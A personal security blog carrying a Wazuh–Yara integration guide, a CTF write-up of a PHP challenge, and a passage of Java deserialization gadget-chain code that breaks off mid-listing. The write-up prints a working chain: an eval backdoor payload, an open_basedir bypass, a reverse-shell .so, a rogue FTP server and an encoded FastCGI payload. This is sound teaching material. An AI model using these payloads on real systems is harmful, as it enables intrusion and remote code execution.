Extraderの博客

Wazuh集成Yara小记

2022-08-01T12:00:00.000Z

环境部署

系统环境全都是CentOS 7.9

我们主要目的是在Wazuh上测试Yara，所以选择最快的部署方式

Manager的部署直接使用官方现有的ova文件导入虚拟机，参考Virtual Machine (OVA)

部署好之后我们直接访问虚拟机的ip地址即可，默认账号密码admin/admin，如果页面没加载出来只显示一行英文，尝试启动wazuh-indexer，systemctl start wazuh-indexer。

登录后在Agent面板有个Deploy new agent按钮，一台agent都没有的显示的直接就是这个界面，在里面选择需要装agent的endpoint的选项，组默认default，然后复制后面的命令到endpoint里执行就可以了。

sudo WAZUH_MANAGER='192.168.88.135' WAZUH_AGENT_GROUP='default' yum install https://packages.wazuh.com/4.x/yum/wazuh-agent-4.3.6-1.x86_64.rpm

这里补充一个agent注册方法，当我们需要在一台已经装了agent的endpoint上重新连接新的manager的时候，可以参考Requesting the key ，使用密钥的方式。

TOKEN=$(curl -u wazuh:wazuh -k -X GET "https://192.168.88.135:55000/security/user/authenticate?raw=true")curl -k -X POST -d '{"name":"k8smaster"}' "https://192.168.88.135:55000/agents?pretty=true" -H "Content-Type:application/json" -H "Authorization: Bearer $TOKEN"

请求后会返回一个Key，我们在endpoint上执行/var/ossec/bin/manage_agents -i

然后再重启agent，systemctl restart wazuh-agent，就可以与manager连接。

Wazuh集成Yara

可以参考官方文档的集成Yara功能

Detecting malware using Yara integration

How to integrate Wazuh with YARA

这里对过程进行简要的记录

EndPoint配置

Yara部署可以参考 Compiling and installing YARA，注意这个仅需要在endpoint上安装即可

我们需要使用jq对wazuh的active-response功能所输出的json进行解析来传入我们的脚本

于是需要在endpoint上安装jq，jq找不到参考 centos7 yum 安装jq，命令如下

wget http://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpmrpm -ivh epel-release-latest-7.noarch.rpmyum repolistyum install jq

我们使用yara官方开源的rule Yara-Rules 来测试yara功能是否能正常使用

yara命令参考：yara /home/yara/rules/index.yar /home/yara/malware/1.txt

测试会报错，显示规则文件中的一些函数不可用，到index.yar文件编辑，只留下webshell的include，其它的都注释掉或者删掉，然后我们添加一条自己的规则（如下），include到index.yar文件中去

rule silent_banker : banker{    meta:        description = "This is just an example"        thread_level = 3        in_the_wild = true    strings:        $a = {6A 40 68 00 30 00 00 6A 14 8D 91}        $b = {8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9}        $c = "UVODFRYSIHLNWPEJXQZAKCBGMT"$d = {4D 5A}    condition:        $a or $b or $c or $d}

测试会正常输出检测到的文件，

添加一个yara.sh脚本到/var/ossec/active-response/bin目录下

#!/bin/bash# Wazuh - Yara active response# Copyright (C) 2015-2022, Wazuh Inc.## This program is free software; you can redistribute it# and/or modify it under the terms of the GNU General Public# License (version 2) as published by the FSF - Free Software# Foundation.#------------------------- Gather parameters -------------------------## Static active response parametersLOCAL=`dirname $0`# Extra argumentsread -r INPUT_JSONYARA_PATH=$(echo $INPUT_JSON | jq -r .parameters.extra_args[1])YARA_RULES=$(echo $INPUT_JSON | jq -r .parameters.extra_args[3])FILENAME=$(echo $INPUT_JSON | jq -r .parameters.alert.syscheck.path)COMMAND=$(echo $INPUT_JSON | jq -r .command)# Move to the active response foldercd $LOCALcd ../# Set LOG_FILE pathPWD=`pwd`LOG_FILE="${PWD}/../logs/active-responses.log"#----------------------- Analyze parameters -----------------------#if [[ ! $YARA_PATH ]] || [[ ! $YARA_RULES ]]then  echo "wazuh-yara: ERROR - Yara active response error. Yara path and rules parameters are mandatory." >> ${LOG_FILE}  exitfi#------------------------ Analyze command -------------------------#if [ ${COMMAND} = "add" ]then  # Send control message to execd  printf '{"version":1,"origin":{"name":"yara","module":"active-response"},"command":"check_keys", "parameters":{"keys":[]}}\n'  read RESPONSE  COMMAND2=$(echo $RESPONSE | jq -r .command)  if [ ${COMMAND2} != "continue" ]  then    echo "wazuh-yara: INFO - Yara active response aborted." >> ${LOG_FILE}    exit 1;  fifi#------------------------- Main workflow --------------------------## Execute Yara scan on the specified filenameyara_output="$("${YARA_PATH}"/yara -w -r "$YARA_RULES" "$FILENAME")"if [[ $yara_output != "" ]]then  # Iterate every detected rule and append it to the LOG_FILE  while read -r line; do  echo "wazuh-yara: INFO - Scan result: $line" >> ${LOG_FILE}  done <<< "$yara_output"fiexit 1;

这个脚本的作用是为了响应active-response所编写的脚本，参考的json读取内容如下，注意这里低版本wazuh没有json输出给脚本文件读取，实测4.1.5无json输出，4.2.5可以

{  "version":1,  "origin":{    "name":"node01",    "module":"wazuh-execd"  },  "command":"add",  "parameters":{    "extra_args":["-yara_path",                  "/usr/local/bin",                  "-yara_rules",                  "/home/yara/rules/index.yar"],    "alert":{      "timestamp":"2022-08-01T07:23:34.120+0000",      "rule":{        "level":7,        "description":"File added to /home/yara/malware/ directory.",        "id":"100301",        "firedtimes":1,        "mail":false,        "groups":["syscheck"]      },      "agent":{        "id":"002",        "name":"k8smaster",        "ip":"192.168.88.136"      },      "manager":{        "name":"wazuh-server"      },      "id":"1659338614.788337",      "full_log":"File '/home/yara/malware/5.txt' added\nMode: whodata\n",      "syscheck":{        "path":"/home/yara/malware/5.txt",        "mode":"whodata",        "size_after":"27",        "perm_after":"rw-r--r--",        "uid_after":"0",        "gid_after":"0",        "md5_after":"b0461abc874bd98d753a54fe83861cad",        "sha1_after":"673d0c5490e051efa2d317f6fb08d26732a91a44",        "sha256_after":"463e92b10416cfd4bfc402d1bf2dbda84f4a74db971dceede3cec07c3e4fef6d",        "uname_after":"root",        "gname_after":"root",        "mtime_after":"2022-08-01T07:23:34",        "inode_after":34679532,        "event":"added",        "audit":{          "user":{            "id":"0",            "name":"root"          },          "process":{            "id":"21354",            "name":"/usr/bin/cp",            "cwd":"/home/yara/malware",            "parent_name":"/usr/bin/bash",            "parent_cwd":"/home/yara/malware",            "ppid":"20631"          },          "group":{            "id":"0",            "name":"root"          },          "login_user":{            "id":"0",            "name":"root"          },          "effective_user":{            "id":"0",            "name":"root"          }        }      },      "decoder":{        "name":"syscheck_new_entry"      },      "location":"syscheck"    },    "program":"active-response/bin/yara.sh"  }}

要想再ossec.log输出如上结果需要在/var/ossec/etc/local_internal_options.conf 中配置execd.debug=2

这个脚本读取json随后将yara分析的结果以某种格式输出到/var/ossec/logs/active-responses.log文件中，参考格式如下

wazuh-yara: INFO - Scan result: silent_banker /home/yara/malware/5.txt

还需要在endpoint中配置一个syscheck以表示需要wazuh监控该目录

/home/yara/malware</directories>

whodata="yes"配置是否有效可以通过auditctl -l | grep wazuh检查，具体可参考官方Auditing who-data in Linux

每次修改ossec.conf都需要重启wazuh-agent才能生效，systemctl restart wazuh-agent

至此Agent的配置就好了

Manager配置

我们需要在Manager上配置active-response功能以主动响应

在/var/ossec/etc/ossec.conf中添加

<ossec_config>    <localfile>      <log_format>sysloglog_format>      <location>/var/ossec/logs/active-responses.loglocation>    localfile>    <command>        <name>yaraname>        <executable>yara.shexecutable>        <extra_args>-yara_path /usr/local/bin -yara_rules /home/yara/rules/index.yarextra_args>        <timeout_allowed>notimeout_allowed>    command>    <active-response>        <command>yaracommand>        <location>locallocation>        <rules_id>100300,100301rules_id>    active-response>ossec_config>

修改ossec.conf的配置需要重启manager，systemctl restart wazuh-manager

在/var/ossec/etc/rules目录下添加文件yara_rules.xml文件，内容如下

<group name="syscheck,">    <rule id="100300" level="7">        <if_sid>550if_sid>        <field name="file">/home/yara/malware/field>        <description>File modified in /home/yara/malware/ directory.description>    rule>    <rule id="100301" level="7">        <if_sid>554if_sid>        <field name="file">/home/yara/malware/field>        <description>File added to /home/yara/malware/ directory.description>    rule>group><group name="yara,">    <rule id="108000" level="0">        <decoded_as>yara_decoderdecoded_as>        <description>Yara grouping ruledescription>    rule>    <rule id="108001" level="12">        <if_sid>108000if_sid>        <match>wazuh-yara: INFO - Scan result: match>        <description>File "$(yara_scanned_file)" is a positive match. Yara rule: $(yara_rule)description>    rule>group>

在/var/ossec/etc/decoders目录中添加文件yara_decoders.xml，内容如下

<decoder name="yara_decoder">    <prematch>wazuh-yara:prematch>decoder><decoder name="yara_decoder1">    <parent>yara_decoderparent>    <regex>wazuh-yara: (\S+) - Scan result: (\S+) (\S+)regex>    <order>log_type, yara_rule, yara_scanned_fileorder>decoder>

流程是，通过监控/home/yara/malware/目录中的文件添加和修改动作，然后触发yara command执行sh脚本，写内容到endpoint的/var/ossec/logs/active-responses.log文件，wazuh监控到log文件的变化，读取后通过yara_decoder解析内容，匹配到后以一个新的rule.group为yara的组显示到Kibana界面上

至此流程拉通

Wazuh还有很多功能需要探索

能把官方文档看明白，wazuh就算入门了

蓝帽杯_2021_One_Pointer_PHP

2021-12-07T06:32:18.000Z

题目给了两个文件

add_api.php

include "user.php";if($user=unserialize($_COOKIE["data"])){$count[++$user->count]=1;if($count[]=1){$user->count+=1;setcookie("data",serialize($user));}else{eval($_GET["backdoor"]);}}else{$user=new User;$user->count=1;setcookie("data",serialize($user));}?>

user.php

class User{public $count;}?>

PHP 数组溢出

主要考查反序列化和php数组溢出绕过，关于php数组溢出可以参考：PHP数组的key溢出问题

直接给出payload

?backdoor=file_put_contents("1.php","");Cookie: data=O%3a4%3a"User"%3a1%3a{s%3a5%3a"count"%3bi%3a9223372036854775806%3b}

查看phpinfo

disable_classes:Exception,SplDoublyLinkedList,Error,ErrorException,ArgumentCountError,ArithmeticError,AssertionError,DivisionByZeroError,CompileError,ParseError,TypeError,ValueError,UnhandledMatchError,ClosedGeneratorException,LogicException,BadFunctionCallException,BadMethodCallException,DomainException,InvalidArgumentException,LengthException,OutOfRangeException,PharException,ReflectionException,RuntimeException,OutOfBoundsException,OverflowException,PDOException,RangeException,UnderflowException,UnexpectedValueException,JsonException,SodiumException    Exception,SplDoublyLinkedList,Error,ErrorException,ArgumentCountError,ArithmeticError,AssertionError,DivisionByZeroError,CompileError,ParseError,TypeError,ValueError,UnhandledMatchError,ClosedGeneratorException,LogicException,BadFunctionCallException,BadMethodCallException,DomainException,InvalidArgumentException,LengthException,OutOfRangeException,PharException,ReflectionException,RuntimeException,OutOfBoundsException,OverflowException,PDOException,RangeException,UnderflowException,UnexpectedValueException,JsonException,SodiumExceptiondisable_functions:stream_socket_client,fsockopen,putenv,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,iconv,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,dl,mail,error_log,debug_backtrace,debug_print_backtrace,gc_collect_cycles,array_merge_recursive

可以通过

printf('open_basedir : %s 
', ini_get('open_basedir'));$file_list = array();// normal files$it = new DirectoryIterator("glob:///*");foreach($it as $f) {    $file_list[] = $f->__toString();}// special files (starting with a dot(.))$it = new DirectoryIterator("glob:///.*");foreach($it as $f) {    $file_list[] = $f->__toString();}sort($file_list);foreach($file_list as $f){        echo "{$f}
";}

列根目录

限制了open_basedir为 /var/www/html

利用chdir()与ini_set()组合来绕过，当然这个操作首先需要拥有当前目录写权限，或者存在一个可以cd进去的子目录

mkdir('test');chdir('test');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(file_get_contents("/flag"));

读文件

但是并读不到flag文件，估计权限不够

攻击 php-fpm绕disable_functions

读取/proc/self/cmdline，发现当前进程是 php-fpm，读取/etc/nginx/sites-available/default文件

php-fpm 绑定在了本地 9001 端口

于是我们可以构造恶意代码利用ssrf攻击本地的php-fpm，通过在vps上搭建恶意的ftp，骗取目标主机将payload转发到自己的9001端口上，从而执行命令，当然这里直接用curl配合gopher协议也可以直接打，就不需要ftp了，但是好像并打不通

原理如下

通过eval()构造一下代码

file_put_contents($file,$data);

FTP 协议允许通过 TCP 发送二进制数据包，更准确的说是该协议的被动模式，即：如果一个客户端试图从FTP服务器上读取一个文件（或写入），服务器会通知客户端将文件的内容读取（或写）到一个特定的IP和端口上。而且，这里对这些IP和端口没有进行必要的限制。例如，服务器可以告诉客户端连接到自己的某一个端口，如果它愿意的话。

如果我们传入 ?file=ftp://evil-server/file.txt&data=payload ，会发生以下情况：

首先通过 file_put_contents() 函数连接到我们的FTP服务器，并试图使用 file_put_contents() 把文件上传上去。但是我们搭建的恶意的ftp服务器将告诉它把文件发送到 127.0.0.1:9000。这样，我们就可以向目标主机本地的 PHP-FPM 发送一个任意的数据包，从而执行代码，造成SSRF了。

写一个so扩展

#include #include #include __attribute__ ((__constructor__)) void preload (void){    system("bash -c 'bash -i >& /dev/tcp/ip/2333 0>&1'");}

编译

gcc a.c -fPIC -shared -o a.so

上传到服务器

base64_encode(file_get_contents('a.so'));

获取到so文件，base64编码后的内容

file_put_contents('a.so',base64_decode('xxx'));

使用刚才的1.php将a.so文件写到服务器；

也可以这样写，直接从vps下载

add_api.php?backdoor=mkdir('test');chdir('test');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');copy('http://ip/a.so'

在自己vps搭一个恶意的ftp服务器，使用的是 FTP 协议的被动模式

ftp_server.py

import sockets = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', 123))s.listen(1)conn, addr = s.accept()conn.send(b'220 welcome\n')conn.send(b'331 Please specify the password.\n')conn.send(b'230 Login successful.\n')conn.send(b'200 Switching to Binary mode.\n')conn.send(b'550 Could not get the file size.\n')conn.send(b'150 ok\n')conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9001)\n') #STOR / (2)conn.send(b'150 Permission denied.\n')conn.send(b'221 Goodbye.\n')conn.close()

使用以下脚本生成攻击 php-fpm的 payload，https://php.okawhio.repl.co/static/2.py

/** * Note : Code is released under the GNU LGPL * * Please do not change the header of this file * * This library is free software; you can redistribute it and/or modify it under the terms of the GNU * Lesser General Public License as published by the Free Software Foundation; either version 2 of * the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. * * See the GNU Lesser General Public License for more details. *//** * Handles communication with a FastCGI application * * @author      Pierrick Charron  * @version     1.0 */class FCGIClient{    const VERSION_1            = 1;    const BEGIN_REQUEST        = 1;    const ABORT_REQUEST        = 2;    const END_REQUEST          = 3;    const PARAMS               = 4;    const STDIN                = 5;    const STDOUT               = 6;    const STDERR               = 7;    const DATA                 = 8;    const GET_VALUES           = 9;    const GET_VALUES_RESULT    = 10;    const UNKNOWN_TYPE         = 11;    const MAXTYPE              = self::UNKNOWN_TYPE;    const RESPONDER            = 1;    const AUTHORIZER           = 2;    const FILTER               = 3;    const REQUEST_COMPLETE     = 0;    const CANT_MPX_CONN        = 1;    const OVERLOADED           = 2;    const UNKNOWN_ROLE         = 3;    const MAX_CONNS            = 'MAX_CONNS';    const MAX_REQS             = 'MAX_REQS';    const MPXS_CONNS           = 'MPXS_CONNS';    const HEADER_LEN           = 8;    /**     * Socket     * @var Resource     */    private $_sock = null;    /**     * Host     * @var String     */    private $_host = null;    /**     * Port     * @var Integer     */    private $_port = null;    /**     * Keep Alive     * @var Boolean     */    private $_keepAlive = false;    /**     * Constructor     *     * @param String $host Host of the FastCGI application     * @param Integer $port Port of the FastCGI application     */    public function __construct($host, $port = 9001) // and default value for port, just for unixdomain socket    {        $this->_host = $host;        $this->_port = $port;    }    /**     * Define whether or not the FastCGI application should keep the connection     * alive at the end of a request     *     * @param Boolean $b true if the connection should stay alive, false otherwise     */    public function setKeepAlive($b)    {        $this->_keepAlive = (boolean)$b;        if (!$this->_keepAlive && $this->_sock) {            fclose($this->_sock);        }    }    /**     * Get the keep alive status     *     * @return Boolean true if the connection should stay alive, false otherwise     */    public function getKeepAlive()    {        return $this->_keepAlive;    }    /**     * Create a connection to the FastCGI application     */    private function connect()    {        if (!$this->_sock) {            //$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5);            $this->_sock = stream_socket_client($this->_host, $errno, $errstr, 5);            if (!$this->_sock) {                throw new Exception('Unable to connect to FastCGI application');            }        }    }    /**     * Build a FastCGI packet     *     * @param Integer $type Type of the packet     * @param String $content Content of the packet     * @param Integer $requestId RequestId     */    private function buildPacket($type, $content, $requestId = 1)    {        $clen = strlen($content);        return chr(self::VERSION_1)         /* version */            . chr($type)                    /* type */            . chr(($requestId >> 8) & 0xFF) /* requestIdB1 */            . chr($requestId & 0xFF)        /* requestIdB0 */            . chr(($clen >> 8 ) & 0xFF)     /* contentLengthB1 */            . chr($clen & 0xFF)             /* contentLengthB0 */            . chr(0)                        /* paddingLength */            . chr(0)                        /* reserved */            . $content;                     /* content */    }    /**     * Build an FastCGI Name value pair     *     * @param String $name Name     * @param String $value Value     * @return String FastCGI Name value pair     */    private function buildNvpair($name, $value)    {        $nlen = strlen($name);        $vlen = strlen($value);        if ($nlen < 128) {            /* nameLengthB0 */            $nvpair = chr($nlen);        } else {            /* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */            $nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF);        }        if ($vlen < 128) {            /* valueLengthB0 */            $nvpair .= chr($vlen);        } else {            /* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */            $nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF);        }        /* nameData & valueData */        return $nvpair . $name . $value;    }    /**     * Read a set of FastCGI Name value pairs     *     * @param String $data Data containing the set of FastCGI NVPair     * @return array of NVPair     */    private function readNvpair($data, $length = null)    {        $array = array();        if ($length === null) {            $length = strlen($data);        }        $p = 0;        while ($p != $length) {            $nlen = ord($data{$p++});            if ($nlen >= 128) {                $nlen = ($nlen & 0x7F << 24);                $nlen |= (ord($data{$p++}) << 16);                $nlen |= (ord($data{$p++}) << 8);                $nlen |= (ord($data{$p++}));            }            $vlen = ord($data{$p++});            if ($vlen >= 128) {                $vlen = ($nlen & 0x7F << 24);                $vlen |= (ord($data{$p++}) << 16);                $vlen |= (ord($data{$p++}) << 8);                $vlen |= (ord($data{$p++}));            }            $array[substr($data, $p, $nlen)] = substr($data, $p+$nlen, $vlen);            $p += ($nlen + $vlen);        }        return $array;    }    /**     * Decode a FastCGI Packet     *     * @param String $data String containing all the packet     * @return array     */    private function decodePacketHeader($data)    {        $ret = array();        $ret['version']       = ord($data{0});        $ret['type']          = ord($data{1});        $ret['requestId']     = (ord($data{2}) << 8) + ord($data{3});        $ret['contentLength'] = (ord($data{4}) << 8) + ord($data{5});        $ret['paddingLength'] = ord($data{6});        $ret['reserved']      = ord($data{7});        return $ret;    }    /**     * Read a FastCGI Packet     *     * @return array     */    private function readPacket()    {        if ($packet = fread($this->_sock, self::HEADER_LEN)) {            $resp = $this->decodePacketHeader($packet);            $resp['content'] = '';            if ($resp['contentLength']) {                $len  = $resp['contentLength'];                while ($len && $buf=fread($this->_sock, $len)) {                    $len -= strlen($buf);                    $resp['content'] .= $buf;                }            }            if ($resp['paddingLength']) {                $buf=fread($this->_sock, $resp['paddingLength']);            }            return $resp;        } else {            return false;        }    }    /**     * Get Informations on the FastCGI application     *     * @param array $requestedInfo information to retrieve     * @return array     */    public function getValues(array $requestedInfo)    {        $this->connect();        $request = '';        foreach ($requestedInfo as $info) {            $request .= $this->buildNvpair($info, '');        }        fwrite($this->_sock, $this->buildPacket(self::GET_VALUES, $request, 0));        $resp = $this->readPacket();        if ($resp['type'] == self::GET_VALUES_RESULT) {            return $this->readNvpair($resp['content'], $resp['length']);        } else {            throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT');        }    }    /**     * Execute a request to the FastCGI application     *     * @param array $params Array of parameters     * @param String $stdin Content     * @return String     */    public function request(array $params, $stdin)    {        $response = '';//        $this->connect();        $request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5));        $paramsRequest = '';        foreach ($params as $key => $value) {            $paramsRequest .= $this->buildNvpair($key, $value);        }        if ($paramsRequest) {            $request .= $this->buildPacket(self::PARAMS, $paramsRequest);        }        $request .= $this->buildPacket(self::PARAMS, '');        if ($stdin) {            $request .= $this->buildPacket(self::STDIN, $stdin);        }        $request .= $this->buildPacket(self::STDIN, '');        echo('data='.urlencode($request));//        fwrite($this->_sock, $request);//        do {//            $resp = $this->readPacket();//            if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) {//                $response .= $resp['content'];//            }//        } while ($resp && $resp['type'] != self::END_REQUEST);//        var_dump($resp);//        if (!is_array($resp)) {//            throw new Exception('Bad request');//        }//        switch (ord($resp['content']{4})) {//            case self::CANT_MPX_CONN://                throw new Exception('This app can\'t multiplex [CANT_MPX_CONN]');//                break;//            case self::OVERLOADED://                throw new Exception('New request rejected; too busy [OVERLOADED]');//                break;//            case self::UNKNOWN_ROLE://                throw new Exception('Role value not known [UNKNOWN_ROLE]');//                break;//            case self::REQUEST_COMPLETE://                return $response;//        }    }}?>// real exploit start here//if (!isset($_REQUEST['cmd'])) {//    die("Check your input\n");//}//if (!isset($_REQUEST['filepath'])) {//    $filepath = __FILE__;//}else{//    $filepath = $_REQUEST['filepath'];//}$filepath = "/var/www/html/add_api.php";$req = '/'.basename($filepath);$uri = $req .'?'.'command=whoami';$client = new FCGIClient("unix:///var/run/php-fpm.sock", -1);$code = "";$php_value = "unserialize_callback_func = system\nextension_dir = /var/www/html\nextension = a.so\ndisable_classes = \ndisable_functions = \nallow_url_include = On\nopen_basedir = /\nauto_prepend_file = ";$params = array(    'GATEWAY_INTERFACE' => 'FastCGI/1.0',    'REQUEST_METHOD'    => 'POST',    'SCRIPT_FILENAME'   => $filepath,    'SCRIPT_NAME'       => $req,    'QUERY_STRING'      => 'command=whoami',    'REQUEST_URI'       => $uri,    'DOCUMENT_URI'      => $req,#'DOCUMENT_ROOT'     => '/',    'PHP_VALUE'         => $php_value,    'SERVER_SOFTWARE'   => '80sec/wofeiwo',    'REMOTE_ADDR'       => '127.0.0.1',    'REMOTE_PORT'       => '9001',    'SERVER_ADDR'       => '127.0.0.1',    'SERVER_PORT'       => '80',    'SERVER_NAME'       => 'localhost',    'SERVER_PROTOCOL'   => 'HTTP/1.1',    'CONTENT_LENGTH'    => strlen($code));echo $client->request($params, $code)."\n";?>

data=%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%02B%00%00%11%0BGATEWAY_INTERFACEFastCGI%2F1.0%0E%04REQUEST_METHODPOST%0F%19SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Fadd_api.php%0B%0CSCRIPT_NAME%2Fadd_api.php%0C%0EQUERY_STRINGcommand%3Dwhoami%0B%1BREQUEST_URI%2Fadd_api.php%3Fcommand%3Dwhoami%0C%0CDOCUMENT_URI%2Fadd_api.php%09%80%00%00%B6PHP_VALUEunserialize_callback_func+%3D+system%0Aextension_dir+%3D+%2Fvar%2Fwww%2Fhtml%0Aextension+%3D+a.so%0Adisable_classes+%3D+%0Adisable_functions+%3D+%0Aallow_url_include+%3D+On%0Aopen_basedir+%3D+%2F%0Aauto_prepend_file+%3D+%0F%0DSERVER_SOFTWARE80sec%2Fwofeiwo%0B%09REMOTE_ADDR127.0.0.1%0B%04REMOTE_PORT9001%0B%09SERVER_ADDR127.0.0.1%0B%02SERVER_PORT80%0B%09SERVER_NAMElocalhost%0F%08SERVER_PROTOCOLHTTP%2F1.1%0E%02CONTENT_LENGTH49%01%04%00%01%00%00%00%00%01%05%00%01%001%00%00%3C%3Fphp+system%28%24_REQUEST%5B%27command%27%5D%29%3B+phpinfo%28%29%3B+%3F%3E%01%05%00%01%00%00%00%00

构造file_put_contents()与我们 vps 上恶意的 ftp 服务器建立连接

backdoor=$file%20=%20$_GET['file'];$data%20=%20$_GET['data'];file_put_contents($file,$data);&file=ftp://ip:123/&data=%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%02B%00%00%11%0BGATEWAY_INTERFACEFastCGI%2F1.0%0E%04REQUEST_METHODPOST%0F%19SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Fadd_api.php%0B%0CSCRIPT_NAME%2Fadd_api.php%0C%0EQUERY_STRINGcommand%3Dwhoami%0B%1BREQUEST_URI%2Fadd_api.php%3Fcommand%3Dwhoami%0C%0CDOCUMENT_URI%2Fadd_api.php%09%80%00%00%B6PHP_VALUEunserialize_callback_func+%3D+system%0Aextension_dir+%3D+%2Fvar%2Fwww%2Fhtml%0Aextension+%3D+a.so%0Adisable_classes+%3D+%0Adisable_functions+%3D+%0Aallow_url_include+%3D+On%0Aopen_basedir+%3D+%2F%0Aauto_prepend_file+%3D+%0F%0DSERVER_SOFTWARE80sec%2Fwofeiwo%0B%09REMOTE_ADDR127.0.0.1%0B%04REMOTE_PORT9001%0B%09SERVER_ADDR127.0.0.1%0B%02SERVER_PORT80%0B%09SERVER_NAMElocalhost%0F%08SERVER_PROTOCOLHTTP%2F1.1%0E%02CONTENT_LENGTH49%01%04%00%01%00%00%00%00%01%05%00%01%001%00%00%3C%3Fphp+system%28%24_REQUEST%5B%27command%27%5D%29%3B+phpinfo%28%29%3B+%3F%3E%01%05%00%01%00%00%00%00

发包，vps监听2333端口拿到shell

无权限读取flag

suid提权

find / -perm -u=s -type f 2>/dev/null

php有suid，进入交互模式执行代码，得到flag

参考

hxp CTF resonator Writeup - SSRF via file_put_contents

通过一道CTF题学习php-fpm攻击

蓝帽杯_one_Pointer_php

[2021 蓝帽杯]one_Pointer_php赛后复盘

Java反序列化Payload

2021-09-13T15:13:54.000Z

把学习java反序列化的一些链都记录一下，简单记录Payload，即利用方法，细节就不分析了，网上文章很多 ~~（其实是理解不深怕分析不到位。。。）~~，当然重在原理理解，以后发现了新思路可能会记录一下吧

本篇主要记录利用链代码，以及自己的一些简单理解，非漏洞原理

未做说明的情况下，测试环境均为Windows10+jdk1.8.0_221+IDEA2019.3

URLDNS

起一个tomcat，版本为8.5.57

servlet代码如下，web.xml自行配置

import javax.servlet.ServletException;import javax.servlet.ServletInputStream;import javax.servlet.http.HttpServlet;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import java.io.IOException;import java.io.ObjectInputStream;import java.io.PrintWriter;import java.util.HashMap;import java.net.URL;public class DemoServlet extends HttpServlet {    @Override    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {        ServletInputStream sis = req.getInputStream();        ObjectInputStream ois = new ObjectInputStream(sis);        try{            ois.readObject();        }catch (ClassNotFoundException e){            e.printStackTrace();        }        ois.close();    }    @Override    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {        PrintWriter out = resp.getWriter();        out.println("this is a demo");    }}

使用ysoserial生成payload，项目地址：https://github.com/frohoff/ysoserial

在IDEA把运行/调试配置的程序参数设置为URLDNS "http://hnhnxq.dnslog.cn"

然后在Serializer.java中加入以下代码

try {    FileOutputStream fileOut = new FileOutputStream("./payload.ser");    ObjectOutputStream ot = new ObjectOutputStream(fileOut);    ot.writeObject(obj);    ot.close();}catch(IOException i) {    i.printStackTrace();}

如下图

目的是将反序列化后的数据保存为payload.ser文件

使用curl发包：curl http://localhost:8088/demo --data-binary @payload.ser

参数解释：--data-binary key=value

HTTP POST请求中的数据为纯二进制数据
value如果是@file_name，则保留文件中的回车符和换行符，不做任何转换

dnslog收到请求记录

这条链一般用来探测是否存在反序列化漏洞，好处是未依赖任何的第三方包，而且并不会影响测试的业务程序

CommonCollections1

ChainedTransformer这条链原理不再赘述，主要依赖sun.reflect.annotation.AnnotationInvocationHandler这个类来触发反序列化，然后通过Map来触发transform的调用

import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.LazyMap;import org.apache.commons.collections.map.TransformedMap;import java.io.ByteArrayInputStream;import java.io.ByteArrayOutputStream;import java.io.ObjectInputStream;import java.io.ObjectOutputStream;import java.lang.annotation.Retention;import java.lang.reflect.Constructor;import java.lang.reflect.InvocationHandler;import java.lang.reflect.Proxy;import java.util.HashMap;import java.util.Map;import sun.reflect.annotation.AnnotationType;public class CommonCollections1 {    public static void main(String[] args) throws Exception {        Transformer[] transformers = new Transformer[]{                new ConstantTransformer(Runtime.class),                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),                new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"}),                new ConstantTransformer(1),        };        CC_LazyMap(transformers);    }    public static void CC_TransformedMap(Transformer[] transformers) throws Exception {        /*            Gadget chain:                ObjectInputStream.readObject()                    AnnotationInvocationHandler.readObject()                        entry.setValue()                            TransformedMap.checkSetValue()                                ChainedTransformer.transform()                                    ConstantTransformer.transform()                                    InvokerTransformer.transform()                                        Method.invoke()                                            Class.getMethod()                                    InvokerTransformer.transform()                                        Method.invoke()                                            Runtime.getRuntime()                                    InvokerTransformer.transform()                                        Method.invoke()                                            Runtime.exec()            Requires:                commons-collections         */        // java8后无法使用，AnnotationInvocationHandler被改写        Transformer transformerChain = new 